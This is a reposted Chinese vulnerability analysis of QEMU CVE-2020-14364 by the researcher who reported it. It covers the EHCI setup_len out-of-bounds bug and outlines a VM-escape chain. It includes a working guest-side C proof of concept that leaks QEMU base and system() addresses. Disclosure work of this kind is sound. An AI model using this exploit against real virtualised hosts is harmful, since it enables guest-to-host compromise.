QEMU CVE-2020-14364 漏洞分析(含 PoC 演示)

最新推荐文章于 2023-11-23 18:10:38 发布
最新推荐文章于 2023-11-23 18:10:38 发布
阅读量1.3k 收藏 1
点赞数
文章标签: 定位 css 正则表达式 csv proxy
原文链接:https://codesafe.qianxin.com
版权

 聚焦源代码安全,网罗国内外最新资讯!

作者:奇安信代码安全实验室研究员张子明(@Ezrak1e)

    奇安信代码安全实验室研究员为Red Hat发现六个漏洞(CVE-2020-14364、CVE-2020-10756、CVE-2020-12829、CVE-2020-14415、CVE-2020-15863和CVE-2020-16092),其中 CVE-2020-14364 被评为具有“重要影响”。研究员第一时间向 Red Hat报告且协助其修复漏洞。本文分析的是 CVE-2020-14364,希望给大家带来一些启发。

01

漏洞分析

QEMU(quick emulator)是一款由Fabrice Bellard等人编写的免费的可执行硬件虚拟化开源托管虚拟机(VMM)。

QEMU的USB后端在实现USB控制器与USB设备通信时存在越界读写漏洞可能导致虚拟机逃逸。

02

漏洞成因

USB总线通过创建一个 USBpacket 对象来和USB设备通信。

Usbpacket对象中包含以下关键内容。

struct USBPacket {

    /* Data fields for use by the driver.  */

    int pid;

    uint64_t id;

    USBEndpoint *ep;

    ....

};

其中pid表明packet的类型,存在三种类型in、out、setup, ep指向endpoint对象,通过此结构定位目标usb设备。

数据交换为usbdevice中缓冲区的data_buf与usbpacket对象中使用usb_packet_map申请的缓冲区两者间通过usb_packet_copy函数实现,为了防止两者缓冲区长度不匹配,传送的长度由s->setup_len限制。

case SETUP_STATE_DATA:

        if (s->setup_buf[0] & USB_DIR_IN) {

            int len = s->setup_len - s->setup_index;

            if (len > p->iov.size) {

                len = p->iov.size;

            }

            usb_packet_copy(p, s->data_buf + s->setup_index, len);

            s->setup_index += len;

            if (s->setup_index >= s->setup_len) {

                s->setup_state = SETUP_STATE_ACK;

            }

            return;

        }

   

漏洞存在于s->setup_len赋值的过程do_token_setup中。

s->setup_len   = (s->setup_buf[7] << 8) | s->setup_buf[6];

    if (s->setup_len > sizeof(s->data_buf)) {

        fprintf(stderr,

                "usb_generic_handle_packet: ctrl buffer too small (%d > %zu)\n",

                s->setup_len, sizeof(s->data_buf));

        p->status = USB_RET_STALL;

        return;

    }

虽然进行了校验,但是由于在校验前,s->setup_len的值已经被设置导致之后的do_token_in或者do_token_out中使用usb_packet_copy时会产生越界读写漏洞。

03

漏洞利用

1、泄露USBdevice对象的地址。

观察越界可读内容发现:

struct USBDevice {

    ...

    uint8_t setup_buf[8];

    uint8_t data_buf[4096];

    int32_t remote_wakeup;

    int32_t setup_state;

    int32_t setup_len;

    int32_t setup_index;

    USBEndpoint ep_ctl;

    USBEndpoint ep_in[USB_MAX_ENDPOINTS];

    USBEndpoint ep_out[USB_MAX_ENDPOINTS];

    QLIST_HEAD(, USBDescString) strings;

    const USBDesc *usb_desc; /* Overrides class usb_desc if not NULL */

    const USBDescDevice *device;

...};

可以从下方的ep_ctl->dev获取到usbdevice的对象地址。

2、通过usbdevice的对象地址我们可以得到s->data_buf的位置,之后只需要覆盖下方的setup_index为目标地址-(s->data_buf)即可实现任意地址写。

3、我们还需要获取任何地址读取功能,setup_buf [0]控制写入方向,并且只能由do_token_setup进行修改。 由于我们在第二步中使用了越界写入功能,因此setup_buf [0]是写入方向,因此只可以进行写入操作,无法读取。

绕过方法:设置setup_index = 0xfffffff8,再次越界,修改setup_buf [0]的值,然后再次将setup_index修改为要读取的地址,以实现任意地址读取。

4、通过任意地址读取usbdevice对象的内容以获取ehcistate对象地址,再次使用任意地址读取ehcistate对象的内容以获取ehci_bus_ops_companion地址。 该地址位于程序data节区。 这时,我们可以获得程序的加载地址和system @ plt地址。也可以通过读取usbdevice固定偏移位置后的usb-tablet对象来获得加载地址。

5、在data_buf中伪造irq结构。

6、以伪造结构劫持ehcistate中的irq对象。

7、通过mmio读取寄存器以触发ehci_update_irq,执行system ("xcalc")。 完成利用。

04

漏洞Poc代码

#include <assert.h>

#include <fcntl.h>

#include <inttypes.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/mman.h>

#include <sys/types.h>

#include <unistd.h>

#include <sys/io.h>

#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

#include <errno.h> 

#include <sys/types.h> 

#include <sys/socket.h> 

#include <stdbool.h>

#include <netinet/in.h> 

unsigned char* mmio_mem;

char *dmabuf;

struct ohci_hcca * hcca;

struct EHCIqtd * qtd;

struct ohci_ed * ed;

struct ohci_td * td;

char *setup_buf;

uint32_t *dmabuf32;

char *td_addr;

struct EHCIqh * qh;

struct ohci_td * td_1;

char *dmabuf_phys_addr;

typedef struct USBDevice USBDevice;

typedef struct USBEndpoint USBEndpoint;

struct USBEndpoint {

    uint8_t nr;

    uint8_t pid;

    uint8_t type;

    uint8_t ifnum;

    int max_packet_size;

    int max_streams;

    bool pipeline;

    bool halted;

    USBDevice *dev;

    USBEndpoint *fd;

    USBEndpoint *bk;

};

 

struct USBDevice {

    int32_t remote_wakeup;

    int32_t setup_state;

    int32_t setup_len;

    int32_t setup_index;

 

    USBEndpoint ep_ctl;

    USBEndpoint ep_in[15];

    USBEndpoint ep_out[15];

};

 

 

typedef struct EHCIqh {

    uint32_t next;                    /* Standard next linkpointer */

 

    /* endpoint characteristics */

    uint32_t epchar;

 

    /* endpoint capabilities */

    uint32_t epcap;

 

    uint32_t current_qtd;             /* Standard next link pointer */

    uint32_t next_qtd;                /* Standard next link pointer*/

    uint32_t altnext_qtd;

 

    uint32_t token;                   /* Same as QTD token */

    uint32_t bufptr[5];               /* Standard buffer pointer */

 

} EHCIqh;

typedef struct EHCIqtd {

    uint32_t next;                    /* Standard next linkpointer */

    uint32_t altnext;                 /* Standard next link pointer*/

    uint32_t token;

 

    uint32_t bufptr[5];               /* Standard buffer pointer */

 

} EHCIqtd;

uint64_t virt2phys(void* p)

{

    uint64_t virt = (uint64_t)p;

    

    // Assert page alignment

 

    int fd =open("/proc/self/pagemap", O_RDONLY);

    if (fd == -1)

        die("open");

    uint64_t offset = (virt /0x1000) * 8;

    lseek(fd, offset, SEEK_SET);

    

    uint64_t phys;

    if (read(fd, &phys, 8 ) !=8)

        die("read");

    // Assert page present

    

 

    phys = (phys & ((1ULL<< 54) - 1)) * 0x1000+(virt&0xfff);

    return phys;

}

 

void die(const char* msg)

{

    perror(msg);

    exit(-1);

}

 

void mmio_write(uint32_t addr, uint32_t value)

{

    *((uint32_t*)(mmio_mem + addr))= value;

}

 

uint64_t mmio_read(uint32_t addr)

{

    return *((uint64_t*)(mmio_mem +addr));

}

void init(){

 

int mmio_fd =open("/sys/devices/pci0000:00/0000:00:05.7/resource0", O_RDWR |O_SYNC);

    if (mmio_fd == -1)

        die("mmio_fd openfailed");

 

mmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd,0);

    if (mmio_mem == MAP_FAILED)

        die("mmap mmio_memfailed");

 

 

dmabuf = mmap(0, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED |MAP_ANONYMOUS, -1, 0);

    if (dmabuf == MAP_FAILED)

        die("mmap");

    mlock(dmabuf, 0x3000);

hcca=dmabuf;

dmabuf32=dmabuf+4;

qtd=dmabuf+0x200;

qh=dmabuf+0x100;

setup_buf=dmabuf+0x300;

 

}

void init_state(){

mmio_write(0x64,0x100);

mmio_write(0x64,0x4);

qh->epchar=0x00;

qh->token=1<<7;

qh->current_qtd=virt2phys(dmabuf+0x200);

struct EHCIqtd * qtd;

qtd=dmabuf+0x200;

qtd->token=1<<7 | 2<<8 | 8<<16;

qtd->bufptr[0]=virt2phys(dmabuf+0x300);

setup_buf[6]=0xff;

setup_buf[7]=0x0;

dmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;

mmio_write(0x28,0x0);

mmio_write(0x30,0x0);

mmio_write(0x38,virt2phys(dmabuf));

mmio_write(0x34,virt2phys(dmabuf));

mmio_write(0x20,0x11);

}

void set_length(uint16_t len,uint8_t in){

mmio_write(0x64,0x100);

mmio_write(0x64,0x4);

setup_buf[0]=in;

setup_buf[6]=len&0xff;

setup_buf[7]=(len>>8)&0xff;

qh->epchar=0x00;

qh->token=1<<7;

qh->current_qtd=virt2phys(dmabuf+0x200);

 

 

qtd->token=1<<7 | 2<<8 | 8<<16;

qtd->bufptr[0]=virt2phys(dmabuf+0x300);

dmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;

mmio_write(0x28,0x0);

mmio_write(0x30,0x0);

mmio_write(0x38,virt2phys(dmabuf));

mmio_write(0x34,virt2phys(dmabuf));

mmio_write(0x20,0x11);

}

void do_copy_read(){

mmio_write(0x64,0x100);

mmio_write(0x64,0x4);

 

qh->epchar=0x00;

qh->token=1<<7;

qh->current_qtd=virt2phys(dmabuf+0x200);

qtd->token=1<<7 | 1<<8 | 0x1f00<<16;

qtd->bufptr[0]=virt2phys(dmabuf+0x1000);

qtd->bufptr[1]=virt2phys(dmabuf+0x2000);

dmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;

mmio_write(0x28,0x0);

mmio_write(0x30,0x0);

mmio_write(0x38,virt2phys(dmabuf));

mmio_write(0x34,virt2phys(dmabuf));

mmio_write(0x20,0x11);

 

}

int main()

{

 

init();

 

iopl(3);

outw(0,0xc0c0);

outw(0,0xc0e0);

outw(0,0xc010);

outw(0,0xc0a0);

sleep(3);

init_state();

sleep(2);

set_length(0x2000,0x80);

sleep(2);

do_copy_read();

sleep(2);

struct USBDevice* usb_device_tmp=dmabuf+0x2004;

struct USBDevice usb_device;

memcpy(&usb_device,usb_device_tmp,sizeof(USBDevice));

 

uint64_t dev_addr=usb_device.ep_ctl.dev;

 

 

 

uint64_t *tmp=dmabuf+0x24f4;

long long base=*tmp;

if(base == 0){

printf("INIT DOWN,DO IT AGAIN");

return 0;

}

 

base-=0xee5480-0x2668c0;

uint64_t system=base+0x2d9610;

puts("\\\\\\\\\\\\\\\\\\\\\\\\");

 

printf("LEAK BASE ADDRESS:%llx!\n",base);

printf("LEAK SYSTEM ADDRESS:%llx!\n",system);

puts("\\\\\\\\\\\\\\\\\\\\\\\\");

}

05

PoC演示视频

推荐阅读

奇安信代码安全实验室帮助Red Hat修复多个QEMU高危漏洞,获官方致谢

题图:Pixabay License

转载请注明“转自奇安信代码卫士 www.codesafe.cn”。

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的

产品线。

    觉得不错,就点个 “在看” 吧~

奇安信代码卫士
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux Kernel nf_tables 本地权限提升漏洞(CVE-2024-1086)
做自己喜欢的事,并将其发挥到极致!
06-06 8142
2024年1月,各Linux发行版官方发布漏洞公告,修复了一个 netfilter:nf_tables 模块中的释放后重用漏洞(CVE-2024-1086)。在nft_verdict_init()函数的错误处理导致nf_hook_slow()函数在NF_DROP的分支的时候以NF_ACCEPT返回,进而在NF_HOOK()函数产生释放后重用漏洞。鉴于该漏洞易于利用,并且允许本地攻击者提升至ROOT权限。​
qemu 规范路径_QEMU-KVM虚拟化平台下虚机逃逸漏洞修复方案
weixin_35832025的博客
02-11 733
一、漏洞简介近期,社区在QEMU-KVM虚拟化平台的vhost内核模块中发现了一个缓冲区溢出漏洞(CVE-2019-14835),可能在虚拟机热迁移过程中被滥用,拥有特权的Guest用户可以将长度无效的描述符传递给宿主机,并升级其在宿主机上的特权,进而通过此漏洞实现虚拟机逃逸攻击,操纵虚拟机使宿主机内核崩溃或在物理机内核中执行恶意代码,控制宿主机。二、virtio 网络简介virtio是为虚拟机开...
虚拟usb设备_QEMUKVM虚拟机逃逸漏洞CVE202014364
weixin_39590566的博客
12-03 775
2020年8月24日,qemu更新了安全补丁,并通告了一个虚拟机逃逸漏洞(CVE-2020-14364),通过数组越界读写,实现虚拟机逃逸,且能以qemu进程所属用户的身份执行任意代码。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。漏洞名称:QEMU-KVM虚拟机逃逸漏洞(CVE-2020-14364)威胁等级:高危影响范围:QEMU全部版本漏洞类型:虚拟机逃逸利用难度...
CVE-2020-14364QEMU USB模块越界读写漏洞通告
爱国小白帽
08-25 1521
360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-082502 报告来源:360CERT 报告作者:360CERT 更新日期:2020-08-25 0x01 漏洞简述 2020年08月25日,360CERT监测发现qemu 发布了 qemu 内存越界漏洞 的风险通告,该漏洞编号为 CVE-2020-14364漏洞等级:严重,漏洞评分:10。 qemu 已发布安全补丁 攻击者通过 构造特殊的内存数据 ,可造成虚拟机逃逸并执行任意代码 的影响
【首发】CVE-2020-15257 容器逃逸漏洞复现与解析附Poc
爱国小白帽
12-05 3090
漏洞简介 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这将允许在与填充程序相同的网络名称空间中运行的恶意容器(有效UID为0,但特权降低)导致新进程以提升的特权运行。 影响版本 containerd < 1.4.3 containerd < 1.3.9
云计算核心组件QEMU连爆10枚高危漏洞
weixin_34117522的博客
09-01 136
自5月至今,作为云计算重要基础组件的QEMU已经被连续爆出10枚高危漏洞,从官方网站漏洞描述看,这10枚漏洞分别会造成包括“虚拟机逃逸”、“宿主机运行时信息泄露”、“拒绝服务”等后果。目前QEMU官方已经联合RedHat安全团队处理并披露了这10枚高危漏洞。 这10枚漏洞均由奇虎360信息安全部云安全团队的成员发现并向官方汇报。 云计算核心模块QEMU ...
QEMU漏洞挖掘
weixin_34115824的博客
06-07 214
转载:https://www.tuicool.com/articles/MzqYbia qemu是一个开源的模拟处理器硬件设备的全虚拟化仿真器和虚拟器. KVM(kernel virtual machine)是一个Linux内核模块,为用户层提供硬件虚拟化的特性,QEMU通过kvm模拟一个目标架构的时候,可以实现与主机相同的架构,从而极大提高模拟效率. 安装配置qemu参见官方文档 ...
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞win平台exe利用工具
11-29
VENOM cve-2015-3456 Qemu 虚拟机逃逸漏洞POC,可以实行堆溢出攻击。
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 7064
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
CVE-2020-3119 Cisco CDP 协议栈溢出漏洞分析
晓得哥的博客
03-30 983
作者:Hcamael@知道创宇404实验室 时间:2020年03月19日 原文地址:https://paper.seebug.org/1154/ 英文版本:https://paper.seebug.org/1156/ Cisco Discovery Protocol(CDP)协议是用来发现局域网中的Cisco设备的链路层协议。 最近Cisco CDP协议爆了几个漏洞,挑了个栈溢出的CVE-2020...
CVE-2020-7961-POC
03-20
CVE-2020-7961-POC 本网站上提供的所有信息仅用于教育目的。信息库的网站和作者对信息的任何滥用概不负责。
CVE-2020-0796-POC.py
03-19
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
jackson 序列化_漏洞通告 | Jackson反序列化安全漏洞CVE202024616)
weixin_39777540的博客
11-29 545
漏洞背景山石网科安全研究院监测发现jackson-databind发布了反序列化漏洞通告,漏洞编号为CVE-2020-24616,经过分析研判该漏洞为高危,建议广大用户及时修复补丁。漏洞详情jackson是一款流行的json解释器,主要负责处理Json的序列化和反序列化。jackson核心模块由三部分构成:jackson-core - 核心包jackson-annotations - 注...
QEMU Guest Agent本地提权漏洞处理(CVE-2023-0664)
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
11-23 705
QEMU Guest Agent(qga)类似于vmware中的 vmtools,相关安全报告显示它的Windows版本安装程序存在本地提权高危漏洞CVE-2023-0664),攻击者可利用该漏洞进行本地权限提升,获得SYSTEM特权运行的交互式命令行界面,可能对各类云主机产品产生一定影响,漏洞详细信息请见附件。简单理解:Fedora 是RedHat的“试验场”,很多新功能和特性先加入Fedora 稳定后再加入RedHat(收费),然后从RedHat再拉出CentOS(免费,培养用户和生态)
已遭利用的微软0day CVE-2020-1464,原来是两年前的老相识
smellycat000的专栏
08-18 864
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队在本月补丁星期二中,微软修复了一个已遭利用的0day漏洞CVE-2020-1464。它可导致MSI文件被转换为恶意的...
Apache Velocity漏洞CVE-2020-13936修复记录
qq_24380005的博客
04-07 8200
这里写自定义目录标题Apache Velocity漏洞CVE-2020-13936修复记录升级jar包即可一、velocity在1.7以后换名字了二、velocity2.3的升级需要jdk1.8附录 Apache Velocity漏洞CVE-2020-13936修复记录 最近由于某些懂得都懂的原因,我们在疯狂的修复漏洞,近期发现了一个Apache Velocity的漏洞,声称如果Velocity版本在2.2及以下时,会有被通过模板攻击的危险。 升级jar包即可 有两个问题需要注意一下 一、velocity在
漏洞预警】Apache Solr基于Velocity模板的远程命令执行漏洞
NOSEC2019的博客
10-31 1047
2019年10月末,白帽汇安全研究院发现网络上出现针对Apache Solr服务器的远程代码执行漏洞。该漏洞是由于Velocity模板存在注入所致(Velocity是一个基于Java的模板引擎,可让使用者通过模板语言引用Java中定义的对象)。攻击者在知道Solr服务器上Core名称后,先把params.resource.loader.enabled设置为true(就可加载指定资源),再进行远程...
对开源库 limdu 命令注入漏洞 (CVE-2020-4066) 的简要分析
smellycat000的专栏
09-29 528
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队开源库Limdu的trainBatch函数中存在一个命令注入漏洞(CVE-2020-4066)。Limdu 是 No...
qemu编译后 qemu --version 不识别
最新发布
04-14
如果你在编译后运行`qemu --version`命令时,无法识别`qemu`命令,可能是因为`qemu`的可执行文件没有正确地添加到系统的可执行路径中。你可以尝试以下几个步骤来解决这个问题: 1. 确认编译成功:首先,请确保你已经成功地编译了`qemu`。编译过程可能会有一些依赖项和配置选项,你需要按照官方文档或编译说明进行操作。 2. 检查可执行文件路径:确认编译后的`qemu`可执行文件所在的路径。你可以使用`ls`命令或者文件管理器来查找该文件。通常情况下,编译后的可执行文件位于`build`目录或者指定的安装目录中。 3. 添加到系统路径:将`qemu`的可执行文件所在的路径添加到系统的可执行路径中。这样系统就能够正确地找到并执行`qemu`命令。具体的步骤可能因操作系统而异,以下是一些常见操作系统的示例: - Linux/macOS:可以将`qemu`的可执行文件所在的路径添加到`PATH`环境变量中。可以通过编辑`.bashrc`或`.bash_profile`文件,并在其中添加类似于以下内容的行: ``` export PATH=/path/to/qemu:$PATH ``` 然后保存文件并重新启动终端,或者执行`source .bashrc`或`source .bash_profile`命令使环境变量生效。 - Windows:可以将`qemu`的可执行文件所在的路径添加到系统的环境变量中。可以通过以下步骤进行操作: - 在桌面上,右键点击"此电脑"(或"我的电脑"),选择"属性"。 - 在弹出的窗口中,点击"高级系统设置"。 - 在"系统属性"窗口中,点击"环境变量"按钮。 - 在"环境变量"窗口中,找到"Path"变量,并点击"编辑"。 - 在弹出的窗口中,点击"新建",然后输入`qemu`的可执行文件所在的路径。 - 点击"确定"保存修改,并关闭所有窗口。 - 重新启动命令提示符或PowerShell窗口,然后尝试运行`qemu --version`命令。 如果你按照上述步骤操作后仍然无法解决问题,请提供更多详细信息,例如你的操作系统、编译过程中的任何错误信息等,以便我能够更好地帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值